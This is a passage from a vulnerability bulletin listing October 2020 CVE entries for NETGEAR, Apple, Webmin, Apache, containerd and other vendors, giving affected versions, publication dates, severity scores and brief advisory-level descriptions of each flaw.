netgear — cbr40_firmware Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11. 2020-10-09 3.3 CVE-2020-26903
MISC
netgear — cbr40_firmware Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25. 2020-10-09 3.3 CVE-2020-26900
MISC
netgear — cbr40_firmware Certain NETGEAR devices are affected by disclosure of sensitive information. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11. 2020-10-09 3.3 CVE-2020-26899
MISC
netgear — d7800_firmware Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10. 2020-10-09 3.5 CVE-2020-26915
MISC
netgear — ex7000_firmware Certain NETGEAR devices are affected by stored XSS. This affects EX7000 before 1.0.1.78, R6250 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R8300 before 1.0.2.128, and R8500 before 1.0.2.128. 2020-10-09 3.5 CVE-2020-26917
MISC
netgear — gs808e_firmware NETGEAR GS808E devices before 1.7.1.0 are affected by denial of service. 2020-10-09 2.1 CVE-2020-26925
MISC
netgear — rbk752_firmware Certain NETGEAR devices are affected by disclosure of sensitive information. This affects RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25. 2020-10-09 3.3 CVE-2020-26901
MISC
netgear — wc7500_firmware Certain NETGEAR devices are affected by disclosure of sensitive information. This affects WC7500 before 6.5.5.24, WC7600 before 6.5.5.24, WC7600v2 before 6.5.5.24, and WC9500 before 6.5.5.24. 2020-10-09 3.3 CVE-2020-26931
MISC
netgear — wc7500_firmware Certain NETGEAR devices are affected by stored XSS. This affects WC7500 before 6.5.5.24, WC7600 before 6.5.5.24, WC7600v2 before 6.5.5.24, and WC9500 before 6.5.5.24. 2020-10-09 3.5 CVE-2020-26923
MISC
webmin — webmin An Improper Data Validation Vulnerability exists in Webmin 1.941 and earlier affecting the Command Shell Endpoint. A user may enter HTML code into the Command field and submit it. Then, after visiting the Action Logs Menu and displaying logs, the HTML code will be rendered (however, JavaScript is not executed). Changes are kept across users. 2020-10-12 3.5 CVE-2020-8821
MISC
webmin — webmin An XSS Vulnerability exists in Webmin 1.941 and earlier affecting the Cluster Shell Commands Endpoint. A user may enter any XSS Payload into the Command field and execute it. Then, after revisiting the Cluster Shell Commands Menu, the XSS Payload will be rendered and executed. 2020-10-12 3.5 CVE-2020-8820
CONFIRM


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
adobe — flash_player Adobe Flash Player versions 32.0.0.433 (and earlier) are affected by an exploitable NULL pointer dereference vulnerability that could result in a crash and arbitrary code execution. Exploitation of this issue requires an attacker to insert malicious strings in an HTTP response that is by default delivered over TLS/SSL. 2020-10-14 not yet calculated CVE-2020-9746
MISC
adobe — magento Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by a persistent XSS vulnerability that allows users to upload malicious JavaScript via the file upload component. This vulnerability could be abused by an unauthenticated attacker to execute XSS attacks against other Magento users. This vulnerability requires a victim to browse to the uploaded file. 2020-10-16 not yet calculated CVE-2020-24408
MISC
amazon — aws_firecracker In Amazon AWS Firecracker before 0.21.3, and 0.22.x before 0.22.1, the serial console buffer can grow its memory usage without limit when data is sent to the standard input. This can result in a memory leak on the microVM emulation thread, possibly occupying more memory than intended on the host. 2020-10-16 not yet calculated CVE-2020-27174
MISC
MISC
MISC
amd — multiple_graphics_drivers A denial of service vulnerability exists in the D3DKMTEscape handler functionality of AMD ATIKMDAG.SYS (e.g. version 26.20.15029.27017). A specially crafted D3DKMTEscape API request can cause an out-of-bounds read in Windows OS kernel memory area. This vulnerability can be triggered from a non-privileged account. 2020-10-13 not yet calculated CVE-2020-12933
MISC
amd — multiple_graphics_drivers A denial of service vulnerability exists in the D3DKMTCreateAllocation handler functionality of AMD ATIKMDAG.SYS (e.g. version 26.20.15029.27017). A specially crafted D3DKMTCreateAllocation API request can cause an out-of-bounds read and denial of service (BSOD). This vulnerability can be triggered from a non-privileged account. 2020-10-13 not yet calculated CVE-2020-12911
MISC
amd — ryzen_master A vulnerability in a dynamically loaded AMD driver in AMD Ryzen Master V15 may allow any authenticated user to escalate privileges to NT authority system. 2020-10-13 not yet calculated CVE-2020-12928
MISC
anuko — time_tracker In Anuko Time Tracker before version 1.19.23.5325, because user input is not properly filtered, a CSV export of a report could contain cells that are treated as formulas by spreadsheet software (for example, when a cell value starts with an equal sign). This is fixed in version 1.19.23.5325. 2020-10-16 not yet calculated CVE-2020-15255
MISC
CONFIRM
apache — solr Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevent some features considered dangerous (which could be used for remote code execution) from being configured in a ConfigSet that’s uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions. 2020-10-13 not yet calculated CVE-2020-13957
MLIST
MISC
apache — tomcat If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers – including HTTP/2 pseudo headers – from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources. 2020-10-12 not yet calculated CVE-2020-13943
MISC
MLIST
CONFIRM
apereo — cas
 
Apereo CAS 5.3.x before 5.3.16, 6.x before 6.1.7.2, 6.2.x before 6.2.4, and 6.3.x before 6.3.0-RC4 mishandles secret keys with Google Authenticator for multifactor authentication. 2020-10-16 not yet calculated CVE-2020-27178
MISC
apple — ios_and_ipados
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory. 2020-10-16 not yet calculated CVE-2020-9958
MISC
apple — ios_and_ipados
 
This issue was addressed with improved checks. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may be able to cause a denial of service. 2020-10-16 not yet calculated CVE-2020-9917
MISC
apple — ios_and_ipados
 
A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory. 2020-10-16 not yet calculated CVE-2020-9964
MISC
apple — ios_and_ipados
 
A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may cause an unexpected application termination. 2020-10-16 not yet calculated CVE-2020-9931
MISC
apple — ios_and_ipados
 
A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen. 2020-10-16 not yet calculated CVE-2020-9959
MISC
apple — macos_catalina

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges. 2020-10-16 not yet calculated CVE-2020-9799
MISC
apple — macos_catalina
 
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-16 not yet calculated CVE-2020-9864
MISC
apple — macos_catalina
 
This issue was addressed with improved data protection. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to leak sensitive user information. 2020-10-16 not yet calculated CVE-2020-9913
MISC
apple — multiple_products

A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9878
MISC
MISC
MISC
apple — multiple_products

An issue existed in the handling of iMessage tapbacks. The issue was resolved with additional verification. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A user that is removed from an iMessage group could rejoin the group. 2020-10-16 not yet calculated CVE-2020-9885
MISC
MISC
MISC
MISC
apple — multiple_products

An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An attacker in a privileged network position may be able to perform denial of service attack using malformed Bluetooth packets. 2020-10-16 not yet calculated CVE-2020-9914
MISC
MISC
apple — multiple_products

A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9893
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products

A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to break out of its sandbox. 2020-10-16 not yet calculated CVE-2020-9865
MISC
MISC
MISC
MISC
apple — multiple_products

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9888
MISC
MISC
MISC
MISC
apple — multiple_products

This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network. 2020-10-16 not yet calculated CVE-2020-9992
MISC
MISC
apple — multiple_products
 
An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information. 2020-10-16 not yet calculated CVE-2020-9934
MISC
MISC
apple — multiple_products
 
Multiple issues were addressed with improved logic. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. 2020-10-16 not yet calculated CVE-2020-9910
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations. 2020-10-16 not yet calculated CVE-2020-9909
MISC
MISC
MISC
apple — multiple_products
 
A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9895
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An access issue existed in Content Security Policy. This issue was addressed with improved access restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. 2020-10-16 not yet calculated CVE-2020-9915
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-16 not yet calculated CVE-2020-9923
MISC
MISC
apple — multiple_products
 
An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to read sensitive location information. 2020-10-16 not yet calculated CVE-2020-9933
MISC
MISC
MISC
apple — multiple_products
 
An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0, Safari 14.0, iCloud for Windows 11.4, iCloud for Windows 7.21. Processing maliciously crafted web content may lead to a cross site scripting attack. 2020-10-16 not yet calculated CVE-2020-9952
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting. 2020-10-16 not yet calculated CVE-2020-9925
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2020-10-16 not yet calculated CVE-2020-9918
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. A malicious attacker may cause Safari to suggest a password for the wrong domain. 2020-10-16 not yet calculated CVE-2020-9903
MISC
MISC
apple — multiple_products
 
A command injection issue existed in Web Inspector. This issue was addressed with improved escaping. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Copying a URL from Web Inspector may lead to command injection. 2020-10-16 not yet calculated CVE-2020-9862
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-16 not yet calculated CVE-2020-9907
MISC
MISC
apple — multiple_products
 
A URL Unicode encoding issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker may be able to conceal the destination of a URL. 2020-10-16 not yet calculated CVE-2020-9916
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period. 2020-10-16 not yet calculated CVE-2020-9946
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9884
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9936
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code. 2020-10-16 not yet calculated CVE-2020-9870
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information. 2020-10-16 not yet calculated CVE-2020-9976
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. An issue in Safari Reader mode may allow a remote attacker to bypass the Same Origin Policy. 2020-10-16 not yet calculated CVE-2020-9911
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9894
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files. 2020-10-16 not yet calculated CVE-2020-9968
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9889
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9890
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9891
MISC
MISC
MISC
MISC
apple — safari
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution. 2020-10-16 not yet calculated CVE-2020-9983
MISC
apple — safari
 
A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9948
MISC
apple — safari
 
A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-16 not yet calculated CVE-2020-9951
MISC
apple — safari
 
A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.2. A malicious attacker may be able to change the origin of a frame for a download in Safari Reader mode. 2020-10-16 not yet calculated CVE-2020-9912
MISC
aptean — product_configurator
 
An issue was discovered in Aptean Product Configurator 4.61.0000 on Windows. A Time based SQL injection affects the nameTxt parameter on the main login page (aka cse?cmd=LOGIN). This can be exploited directly, and remotely. 2020-10-16 not yet calculated CVE-2020-26944
MISC
MISC
arc_informatique — pcvue

A Denial Of Service vulnerability exists in PcVue from version 8.10 onward, due to the ability for a non-authorized user to modify information used to validate messages sent by legitimate web clients. 2020-10-12 not yet calculated CVE-2020-26868
MISC
arc_informatique — pcvue
 
A Remote Code Execution vulnerability exists in PcVue from version 8.10 onward, due to the unsafe deserialization of messages received on the interface. 2020-10-12 not yet calculated CVE-2020-26867
MISC
arc_informatique — pcvue
 
An information exposure vulnerability exists in PcVue 12, allowing a non-authorized user to access session data of legitimate users. 2020-10-12 not yet calculated CVE-2020-26869
MISC
atlassian — jira_server
 
Affected versions of Atlassian Jira Server allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in Jira issue filter export files. The affected versions are before 8.5.9, from version 8.6.0 before 8.12.3, and from version 8.13.0 before 8.13.1. 2020-10-12 not yet calculated CVE-2020-14184
MISC
atlassian — jira_server
 
Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource. The affected versions are before 7.13.18, from version 8.0.0 before 8.5.9, and from version 8.6.0 before version 8.12.2. 2020-10-15 not yet calculated CVE-2020-14185
MISC
b&r — automation_runtime
 
A memory leak in the TFTP service in B&R Automation Runtime versions <N4.26, <N4.34, <F4.45, <E4.53, <D4.63, <A4.73 and prior could allow an unauthenticated attacker with network access to cause a denial of service (DoS) condition. 2020-10-15 not yet calculated CVE-2020-11637
MISC
b&r — gatemanager_4260_and_9250
 
A log information disclosure vulnerability in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to view log information reserved for other users. 2020-10-15 not yet calculated CVE-2020-11646
MISC
b&r — gatemanager_4260_and_9250
 
An information disclosure vulnerability in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to view information of devices belonging to foreign domains. 2020-10-15 not yet calculated CVE-2020-11643
MISC

b&r — gatemanager_4260_and_9250_and_8250

A denial of service vulnerability in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to limit availability of GateManager instances. 2020-10-15 not yet calculated CVE-2020-11645
MISC

b&r — gatemanager_4260_and_9250_and_8250

The information disclosure vulnerability present in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to generate fake audit log messages. 2020-10-15 not yet calculated CVE-2020-11644
MISC
b&r — sitemanager
 
The local file inclusion vulnerability present in B&R SiteManager versions <9.2.620236042 allows authenticated users to impact availability of SiteManager instances. 2020-10-15 not yet calculated CVE-2020-11642
MISC
b&r — sitemanager
 
A local file inclusion vulnerability in B&R SiteManager versions <9.2.620236042 allows authenticated users to read sensitive files from SiteManager instances. 2020-10-15 not yet calculated CVE-2020-11641
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Denial of Service vulnerability (infinite loop) via a crafted .mp3 file. This weakness could allow attackers to consume excessive CPU and the application becomes unresponsive. 2020-10-16 not yet calculated CVE-2019-18796
MISC
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Use after Free vulnerability via a crafted .ogg file. An attacker can exploit this to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service. 2020-10-16 not yet calculated CVE-2019-18794
MISC
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile out of bounds read vulnerability via a crafted .wav file. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service. 2020-10-16 not yet calculated CVE-2019-18795
MISC
MISC
bass — audio_library
 
The BASSMIDI plugin 2.4.12.1 for Un4seen BASS Audio Library on Windows is prone to an out of bounds write vulnerability. An attacker may exploit this to execute code on the target machine. A failure in exploitation leads to a denial of service. 2020-10-16 not yet calculated CVE-2019-19513
MISC
MISC
bender — comtraxx
 
In Bender COMTRAXX, user authorization is validated for most, but not all, routes in the system. A user with knowledge about the routes can read and write configuration data without prior authorization. This affects COM465IP, COM465DP, COM465ID, CP700, CP907, and CP915 devices before 4.2.0. 2020-10-16 not yet calculated CVE-2019-19885
MISC
blackberry — uem_core
 
An improper input validation vulnerability in the UEM Core of BlackBerry UEM version(s) 12.13.0, 12.12.1a QF2 (and earlier), and 12.11.1 QF3 (and earlier) could allow an attacker to potentially cause a Denial of Service (DoS) of the UEM Core service. 2020-10-14 not yet calculated CVE-2020-6933
MISC
bluez — bluez
 
In BlueZ before 5.55, a double free was found in the gatttool disconnect_cb() routine from shared/att.c. A remote attacker could potentially cause a denial of service or code execution, during service discovery, due to a redundant disconnect MGMT event. 2020-10-15 not yet calculated CVE-2020-27153
MISC
MISC
MISC
canimaan_software — clamxav
 
An issue was discovered in ClamXAV 3 before 3.1.1. A malicious actor could use a properly signed copy of ClamXAV 2 (running with an injected malicious dylib) to communicate with ClamXAV 3’s helper tool and perform privileged operations. This occurs because of inadequate client verification in the helper tool. 2020-10-16 not yet calculated CVE-2020-26893
MISC
cisco — duo_authentication
 
A privilege escalation vulnerability exists in the Duo Authentication for Windows Logon and RDP implementation. This vulnerability could allow an authenticated local attacker to overwrite files in privileged directories. 2020-10-14 not yet calculated CVE-2020-3427
CISCO
cisco — duo_network_gateway
 
Duo has identified and fixed an issue with the Duo Network Gateway (DNG) product in which some customer-provided SSL certificates and private keys were not excluded from logging. This issue resulted in certificate and private key information being written out in plain-text to local files on the DNG host. Any private keys logged in this way could be viewed by those with access to the DNG host operating system without any need for reversing encrypted values or similar techniques. An attacker that gained access to the DNG logs and with the ability to intercept and manipulate network traffic between a user and the DNG, could decrypt and manipulate SSL/TLS connections to the DNG and to the protected applications behind it. Duo Network Gateway (DNG) versions 1.3.3 through 1.5.7 are affected. 2020-10-14 not yet calculated CVE-2020-3483
CISCO
containerd — containerd
 
In containerd (an industry-standard container runtime) before version 1.2.14 there is a credential leaking vulnerability. If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (otherwise known as a “foreign layer”), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x but not 1.3.0 or later, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers. If an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account. The default containerd resolver is used by the cri-containerd plugin (which can be used by Kubernetes), the ctr development tool, and other client programs that have explicitly linked against it. This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected. If you are using containerd 1.3 or later, you are not affected. If you are using cri-containerd in the 1.2 series or prior, you should ensure you only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected. 2020-10-16 not yet calculated CVE-2020-15157
MISC
CONFIRM
crossbeam — crossbeam
 
Crossbeam is a set of tools for concurrent programming. In crossbeam-channel before version 0.4.4, the bounded channel incorrectly assumes that `Vec::from_iter` has allocated capacity that is the same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumption described above. This is unsound and causes deallocation with the incorrect capacity when `Vec::from_iter` has allocated a size different from the number of iterator elements. This has been fixed in crossbeam-channel 0.4.4. 2020-10-16 not yet calculated CVE-2020-15254
MISC
MISC
CONFIRM
MISC
dca — vantage_analyzer
 
A vulnerability has been identified in DCA Vantage Analyzer (All versions < V4.5 are affected by CVE-2020-7590. In addition, serial numbers < 40000 running software V4.4.0 are also affected by CVE-2020-15797). Affected devices use a hard-coded password to protect the onboard database. This could allow an attacker to read and/or modify the onboard database. Successful exploitation requires direct physical access to the device. 2020-10-13 not yet calculated CVE-2020-7590
MISC
dca — vantage_analyzer
 
A vulnerability has been identified in DCA Vantage Analyzer (All versions < V4.5 are affected by CVE-2020-7590. In addition, serial numbers < 40000 running software V4.4.0 are also affected by CVE-2020-15797). Improper Access Control could allow an unauthenticated attacker to escape from the restricted environment (“kiosk mode”) and access the underlying operating system. Successful exploitation requires direct physical access to the system. 2020-10-13 not yet calculated CVE-2020-15797
MISC
debian — sympa
 
debian/sympa.postinst for the Debian Sympa package before 6.2.40~dfsg-7 uses mode 4755 for sympa_newaliases-wrapper, whereas the intended permissions are mode 4750 (for access by the sympa group). 2020-10-10 not yet calculated CVE-2020-26932
MISC
MISC
dell — emc_networker
 
Dell EMC NetWorker versions prior to 19.3.0.2 contain an incorrect privilege assignment vulnerability. A non-LDAP remote user with low privileges may exploit this vulnerability to perform ‘saveset’ related operations in an unintended manner. The vulnerability is not exploitable by users authenticated via LDAP. 2020-10-16 not yet calculated CVE-2020-26182
CONFIRM
dell — emc_networker
 
Dell EMC NetWorker versions prior to 19.3.0.2 contain an improper authorization vulnerability. Certain remote users with low privileges may exploit this vulnerability to perform ‘nsrmmdbd’ operations in an unintended manner. 2020-10-16 not yet calculated CVE-2020-26183
CONFIRM
desigo — insight
 
A vulnerability has been identified in Desigo Insight (All versions). Some error messages in the web application show the absolute path to the requested resource. This could allow an authenticated attacker to retrieve additional information about the host system. 2020-10-15 not yet calculated CVE-2020-15794
MISC
desigo — insight
 
A vulnerability has been identified in Desigo Insight (All versions). The web service does not properly apply input validation for some query parameters in a reserved area. This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack. 2020-10-15 not yet calculated CVE-2020-15792
MISC
desigo — insight
 
A vulnerability has been identified in Desigo Insight (All versions). The device does not properly set the X-Frame-Options HTTP Header which makes it vulnerable to Clickjacking attacks. This could allow an unauthenticated attacker to retrieve or modify data in the context of a legitimate user by tricking that user to click on a website controlled by the attacker. 2020-10-15 not yet calculated CVE-2020-15793
MISC
eclipse — vert
 
